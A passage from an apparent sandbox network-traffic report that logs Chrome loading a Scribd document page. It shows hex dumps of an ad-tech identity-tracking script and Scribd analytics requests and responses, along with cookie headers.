                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC405INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 138354
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 09:24:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public,max-age=86400
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 6cd1b68179ed0faf63bc1975a32712fe.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: MRS53-P1
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: 4t3ttl_xHwK1dzVwFZcy4u3i3zU5NrLiOlrXGPI_btaucGDs_Q0GHQ==
                                                                                                                                                                                                                                                                                                                                                                                        Age: 45310
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC15979INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 4c 49 3d 7b 22 61 70 70 49 64 22 3a 22 61 2d 30 35 74 64 22 2c 22 61 64 76 65 72 74 69 73 65 72 49 64 22 3a 33 32 30 32 34 2c 22 73 79 6e 63 22 3a 74 72 75 65 2c 22 65 75 6e 73 22 3a 66 61 6c 73 65 2c 22 69 64 65 6e 74 69 66 69 65 72 73 54 6f 52 65 73 6f 6c 76 65 22 3a 22 5f 61 61 6c 79 74 69 63 73 75 69 64 2c 74 72 63 5f 63 6f 6f 6b 69 65 5f 73 74 6f 72 61 67 65 2c 64 74 6d 5f 74 6f 6b 65 6e 2c 5f 70 75 62 63 69 64 2c 68 69 64 2c 6d 75 75 69 64 2c 67 6c 6f 62 61 6c 54 49 5f 53 49 44 2c 61 6a 73 5f 75 73 65 72 5f 69 64 2c 5f 6c 69 5f 75 75 69 64 2c 73 5f 65 63 69 64 2c 5f 73 68 6f 70 69 66 79 5f 79 2c 67 75 70 5f 61 6e 6f 6e 69 64 2c 73 5f 76 69 2c 49 58 57 52 41 50 50 45 52 4c 69 76 65 49 6e 74 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !function(){window.LI={"appId":"a-05td","advertiserId":32024,"sync":true,"euns":false,"identifiersToResolve":"_aalyticsuid,trc_cookie_storage,dtm_token,_pubcid,hid,muuid,globalTI_SID,ajs_user_id,_li_uuid,s_ecid,_shopify_y,gup_anonid,s_vi,IXWRAPPERLiveInte
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC16384INData Raw: 69 6f 6e 28 65 29 7b 69 66 28 21 45 73 29 72 65 74 75 72 6e 20 53 73 5b 65 5d 3b 76 61 72 20 74 3d 43 73 28 53 73 2c 65 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 7d 2c 6b 73 3d 6e 2c 50 73 3d 48 2c 52 73 3d 4c 74 28 22 69 74 65 72 61 74 6f 72 22 29 2c 49 73 3d 21 6b 73 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 65 77 20 55 52 4c 28 22 62 3f 61 3d 31 26 62 3d 32 26 63 3d 33 22 2c 22 68 74 74 70 73 3a 2f 2f 61 22 29 2c 74 3d 65 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2c 6e 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 22 61 3d 31 26 61 3d 32 26 62 3d 33 22 29 2c 72 3d 22 22 3b 72 65 74 75 72 6e 20 65 2e 70 61 74 68 6e 61 6d 65 3d 22 63 25 32 30 64 22 2c 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ion(e){if(!Es)return Ss[e];var t=Cs(Ss,e);return t&&t.value},ks=n,Ps=H,Rs=Lt("iterator"),Is=!ks((function(){var e=new URL("b?a=1&b=2&c=3","https://a"),t=e.searchParams,n=new URLSearchParams("a=1&a=2&b=3"),r="";return e.pathname="c%20d",t.forEach((function
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC16384INData Raw: 63 7c 7c 22 2f 22 3d 3d 3d 6f 7c 7c 22 3f 22 3d 3d 3d 6f 7c 7c 22 23 22 3d 3d 3d 6f 7c 7c 22 5c 5c 22 3d 3d 3d 6f 26 26 6c 2e 69 73 53 70 65 63 69 61 6c 28 29 7c 7c 74 29 7b 69 66 28 22 22 21 3d 3d 64 29 7b 76 61 72 20 6d 3d 41 75 28 64 2c 31 30 29 3b 69 66 28 6d 3e 36 35 35 33 35 29 72 65 74 75 72 6e 20 58 75 3b 6c 2e 70 6f 72 74 3d 6c 2e 69 73 53 70 65 63 69 61 6c 28 29 26 26 6d 3d 3d 3d 68 64 5b 6c 2e 73 63 68 65 6d 65 5d 3f 6e 75 6c 6c 3a 6d 2c 64 3d 22 22 7d 69 66 28 74 29 72 65 74 75 72 6e 3b 63 3d 54 64 3b 63 6f 6e 74 69 6e 75 65 7d 72 65 74 75 72 6e 20 58 75 7d 64 2b 3d 6f 3b 62 72 65 61 6b 3b 63 61 73 65 20 55 64 3a 69 66 28 6c 2e 73 63 68 65 6d 65 3d 22 66 69 6c 65 22 2c 22 2f 22 3d 3d 3d 6f 7c 7c 22 5c 5c 22 3d 3d 3d 6f 29 63 3d 41 64 3b 65 6c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: c||"/"===o||"?"===o||"#"===o||"\\"===o&&l.isSpecial()||t){if(""!==d){var m=Au(d,10);if(m>65535)return Xu;l.port=l.isSpecial()&&m===hd[l.scheme]?null:m,d=""}if(t)return;c=Td;continue}return Xu}d+=o;break;case Ud:if(l.scheme="file","/"===o||"\\"===o)c=Ad;el
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC16384INData Raw: 2c 61 76 3d 52 68 2c 6c 76 3d 74 67 2e 73 65 74 2c 63 76 3d 52 67 2c 75 76 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 72 79 7b 31 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 2c 74 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 2c 64 76 3d 49 67 2c 70 76 3d 6c 67 2c 66 76 3d 4e 72 2c 68 76 3d 4f 67 2c 67 76 3d 42 67 2c 76 76 3d 51 67 2c 79 76 3d 22 50 72 6f 6d 69 73 65 22 2c 6d 76 3d 67 76 2e 43 4f 4e 53 54 52 55 43 54 4f 52 2c 77 76 3d 67 76 2e 52 45 4a 45 43 54 49 4f 4e 5f 45 56 45 4e 54 2c 62 76 3d 66 76 2e 67 65 74 74 65 72 46 6f 72 28 79 76 29 2c 53 76 3d 66 76 2e 73 65 74 2c 45 76 3d 68 76 26 26 68 76 2e 70 72 6f 74 6f 74 79 70 65 2c 43 76 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,av=Rh,lv=tg.set,cv=Rg,uv=function(e,t){try{1===arguments.length?console.error(e):console.error(e,t)}catch(e){}},dv=Ig,pv=lg,fv=Nr,hv=Og,gv=Bg,vv=Qg,yv="Promise",mv=gv.CONSTRUCTOR,wv=gv.REJECTION_EVENT,bv=fv.getterFor(yv),Sv=fv.set,Ev=hv&&hv.prototype,Cv=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC16384INData Raw: 7d 7d 66 75 6e 63 74 69 6f 6e 20 47 77 28 65 29 7b 72 65 74 75 72 6e 7b 6b 69 6e 64 3a 22 73 63 68 65 6d 61 22 2c 74 79 70 65 3a 22 62 6f 6f 6c 65 61 6e 22 2c 72 65 66 65 72 65 6e 63 65 3a 47 77 2c 65 78 70 65 63 74 73 3a 22 62 6f 6f 6c 65 61 6e 22 2c 61 73 79 6e 63 3a 21 31 2c 6d 65 73 73 61 67 65 3a 65 2c 5f 72 75 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 76 61 6c 75 65 3f 65 2e 74 79 70 65 64 3d 21 30 3a 4e 77 28 74 68 69 73 2c 22 74 79 70 65 22 2c 65 2c 74 29 2c 65 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 7a 77 28 65 2c 74 29 7b 72 65 74 75 72 6e 7b 6b 69 6e 64 3a 22 73 63 68 65 6d 61 22 2c 74 79 70 65 3a 22 63 75 73 74 6f 6d 22 2c 72 65 66 65 72 65 6e 63 65 3a 7a 77 2c 65 78 70 65 63 74 73 3a 22 75
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: }}function Gw(e){return{kind:"schema",type:"boolean",reference:Gw,expects:"boolean",async:!1,message:e,_run(e,t){return"boolean"==typeof e.value?e.typed=!0:Nw(this,"type",e,t),e}}}function zw(e,t){return{kind:"schema",type:"custom",reference:zw,expects:"u
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC16384INData Raw: 43 6f 6e 73 65 6e 74 3d 65 2e 6c 6f 61 64 43 6f 6e 73 65 6e 74 55 6e 63 61 63 68 65 64 28 29 29 2c 79 69 65 6c 64 20 65 2e 63 61 63 68 65 64 43 6f 6e 73 65 6e 74 7d 29 29 28 29 7d 6c 6f 61 64 43 6f 6e 73 65 6e 74 55 6e 63 61 63 68 65 64 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 41 77 28 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 72 65 74 75 72 6e 7b 67 64 70 72 3a 79 69 65 6c 64 20 5a 62 28 24 62 28 65 2e 6c 6f 67 67 65 72 29 2e 63 61 74 63 68 28 28 28 29 3d 3e 7b 7d 29 29 2c 31 30 30 29 2c 67 70 70 3a 79 69 65 6c 64 20 5a 62 28 41 62 28 65 2e 6c 6f 67 67 65 72 29 2e 63 61 74 63 68 28 28 28 29 3d 3e 7b 7d 29 29 2c 31 30 30 29 2c 75 73 50 72 69 76 61 63 79 3a 79 69 65 6c 64 20 5a 62 28 47 62 28 65 2e 6c 6f 67 67 65 72 29 2e 63 61 74 63 68
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Consent=e.loadConsentUncached()),yield e.cachedConsent}))()}loadConsentUncached(){var e=this;return Aw((function*(){return{gdpr:yield Zb($b(e.logger).catch((()=>{})),100),gpp:yield Zb(Ab(e.logger).catch((()=>{})),100),usPrivacy:yield Zb(Gb(e.logger).catch
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC16384INData Raw: 7b 7d 3b 63 6f 6e 73 74 7b 63 6f 6e 74 65 78 74 53 65 6c 65 63 74 6f 72 73 3a 6e 2c 6d 61 78 4c 65 6e 67 74 68 3a 72 7d 3d 74 3b 69 66 28 22 22 3d 3d 3d 6e 7c 7c 72 3c 3d 30 29 72 65 74 75 72 6e 7b 7d 3b 63 6f 6e 73 74 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3b 6c 65 74 20 72 3d 22 22 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 4f 45 28 65 2e 6f 75 74 65 72 48 54 4d 4c 29 2e 73 74 72 69 6e 67 57 69 74 68 6f 75 74 52 61 77 45 6d 61 69 6c 73 2c 6f 3d 72 2b 6e 3b 69 66 28 69 3d 6f 2c 4d 61 74 68 2e 63 65 69 6c 28 34 2a 6e 65 77 20 42 6c 6f 62 28 5b 69 5d 29 2e 73 69 7a 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {};const{contextSelectors:n,maxLength:r}=t;if(""===n||r<=0)return{};const o=function(e,t){const n=window.document.querySelectorAll(e);let r="";return n.forEach((e=>{const n=OE(e.outerHTML).stringWithoutRawEmails,o=r+n;if(i=o,Math.ceil(4*new Blob([i]).size
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC16384INData Raw: 28 72 29 26 26 72 2e 6c 65 6e 67 74 68 3e 31 30 26 26 28 6e 5b 65 5d 3d 72 2e 73 6c 69 63 65 28 30 2c 31 30 29 29 7d 72 65 74 75 72 6e 20 6e 65 77 20 73 43 28 6e 29 7d 28 7b 73 6f 75 72 63 65 45 76 65 6e 74 3a 65 7d 29 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 2c 6f 2c 69 3b 63 6f 6e 73 74 20 73 3d 64 62 2e 65 6d 70 74 79 28 29 2e 61 64 64 28 22 64 74 73 74 6d 70 22 2c 65 2e 74 69 6d 65 73 74 61 6d 70 2e 67 65 74 54 69 6d 65 28 29 29 3b 73 77 69 74 63 68 28 65 2e 69 6e 74 65 67 72 61 74 69 6f 6e 2e 74 79 70 65 29 7b 63 61 73 65 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 3a 73 2e 61 64 64 4f 70 74 69 6f 6e 61 6c 28 22 61 69 64 22 2c 65 2e 69 6e 74 65 67 72 61 74 69 6f 6e 2e 61 70 70 49 64 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 64
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (r)&&r.length>10&&(n[e]=r.slice(0,10))}return new sC(n)}({sourceEvent:e}),E=function(e){var t,n,r,o,i;const s=db.empty().add("dtstmp",e.timestamp.getTime());switch(e.integration.type){case"application":s.addOptional("aid",e.integration.appId);break;case"d
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC7687INData Raw: 69 64 35 3a 6e 2c 6c 69 6e 6b 54 79 70 65 3a 72 7d 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 74 2e 6c 6f 67 67 65 72 2e 65 72 72 6f 72 28 6e 65 77 20 6e 78 28 65 29 29 7d 6e 3d 21 30 7d 65 6c 73 65 20 79 69 65 6c 64 20 6e 65 77 20 65 6d 28 28 74 3d 3e 73 65 74 54 69 6d 65 6f 75 74 28 74 2c 65 29 29 29 7d 29 29 2c 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 74 68 69 73 2e 69 64 35 43 6f 6c 6c 65 63 74 69 6f 6e 45 6e 61 62 6c 65 64 7c 7c 28 74 68 69 73 2e 69 64 35 43 6f 6c 6c 65 63 74 69 6f 6e 45 6e 61 62 6c 65 64 3d 21 30 2c 74 68 69 73 2e 6c 6f 67 67 65 72 2e 69 6e 66 6f 28 22 53 63 68 65 64 75 6c 69 6e 67 20 69 64 35 20 63 6f 6c 6c 65 63 74 69 6f 6e 22 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 61 70 70 6c 79 28 74 68 69 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: id5:n,linkType:r})}))}catch(e){t.logger.error(new nx(e))}n=!0}else yield new em((t=>setTimeout(t,e)))})),n.apply(this,arguments)}this.id5CollectionEnabled||(this.id5CollectionEnabled=!0,this.logger.info("Scheduling id5 collection"),function(){n.apply(this


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        43192.168.2.1649764151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC2636OUTPOST /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1944
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1944OUTData Raw: 7b 22 64 6f 63 5f 69 64 22 3a 38 30 31 35 31 39 32 39 31 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 70 61 67 65 3a 6c 6f 61 64 65 64 22 2c 22 76 61 6c 75 65 22 3a 6e 75 6c 6c 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 30 36 54 32 31 3a 35 39 3a 32 33 2e 36 37 32 5a 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 61 6e 61 6c 79 74 69 63 73 2e 73 69 64 65 62 61 72 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 77 6e 6c 6f 61 64 22 2c 22 76 61 6c 75 65 22 3a 22 7b 5c 22 74 69 74 6c 65 5c 22 3a 5c 22 41 64 76 69 63 65 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 5c 22 7d 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 30 36 54 32 31 3a 35 39 3a 32 33 2e 37 39 33 5a 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 64 6f 63 5f 76 69 65 77 5f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"doc_id":801519291,"events":[{"name":"page:loaded","value":null,"timestamp":"2024-12-06T21:59:23.672Z"},{"name":"analytics.sidebar.document.download","value":"{\"title\":\"Advice Notification\"}","timestamp":"2024-12-06T21:59:23.793Z"},{"name":"doc_view_
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740077-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC40INData Raw: 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 6d 65 73 73 61 67 65 22 3a 22 73 75 63 63 65 73 73 22 7d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"status_code":200,"message":"success"}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        44192.168.2.1649765151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC2373OUTGET /log/dd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC389INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740073-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        45192.168.2.1649768151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC2606OUTGET /doc-page/recommenders/801519291?recs_veils_of_discoverability=undefined&recs_embedding_reranking_docpage=undefined&recs_explore_rerank_scribd=undefined&doc_page_pmp_boosting=control HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
